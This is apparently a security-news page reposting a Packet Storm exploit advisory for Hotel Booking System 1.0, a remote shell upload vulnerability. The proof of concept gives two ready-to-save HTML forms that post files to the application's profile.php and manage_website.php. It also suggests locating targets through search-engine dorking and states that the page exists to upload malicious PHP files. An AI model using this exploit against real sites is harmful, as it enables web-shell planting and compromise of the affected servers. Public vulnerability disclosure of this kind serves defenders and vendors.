Security
Headlines
HeadlinesLatestCVEs

Headline

Hotel Booking System 1.0 Shell Upload

Hotel Booking System version 1.0 suffers from a remote shell upload vulnerability.

Packet Storm
#vulnerability#web#windows#google#php#auth#firefox

=============================================================================================================================================
| # Title : Hotel Booking System 1.0 Remote File Upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel.zip |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page is designed to remotely upload malicious PHP files directly.

[+] Line 9 set url of target.

[+] The path to upload the files : http://127.0.0.1/hotel/uploadImage\Profile

[+] Save Code as html :

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Image Upload Form</title>
</head>
<body>
<form action="http://127.0.0.1/source%20code/profile.php" method="POST" enctype="multipart/form-data">
<label for="image">Upload an image:</label>
<input type="file" id="image" name="image" accept="image/*" required>
<button type="submit" name="btn_update">Upload</button>
</form>
</body>
</html>

[+] part 2 : infected item ( manage_website.php ) .

[+] Line 9 set url of target.

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Update Website Images</title>
</head>
<body>
<form action="http://127.0.0.1/source%20code/manage_website.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="old_website_image" value="current_website_image.jpg">
<label for="website_image">Upload new website image:</label>
<input type="file" id="website_image" name="website_image" accept="image/*">

            <input type="hidden" name="old_login_image" value="current_login_image.jpg">  
    <label for="login_image">Upload new login image:</label>  
    <input type="file" id="login_image" name="login_image" accept="image/*">

            <input type="hidden" name="old_back_login_image" value="current_back_login_image.jpg">  
    <label for="back_login_image">Upload new back login image:</label>  
    <input type="file" id="back_login_image" name="back_login_image" accept="image/*">

            <button type="submit" name="btn_web">Update Images</button>  
</form>  

</body>
</html>

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================

Packet Storm: Latest News

Scapy Packet Manipulation Tool 2.6.1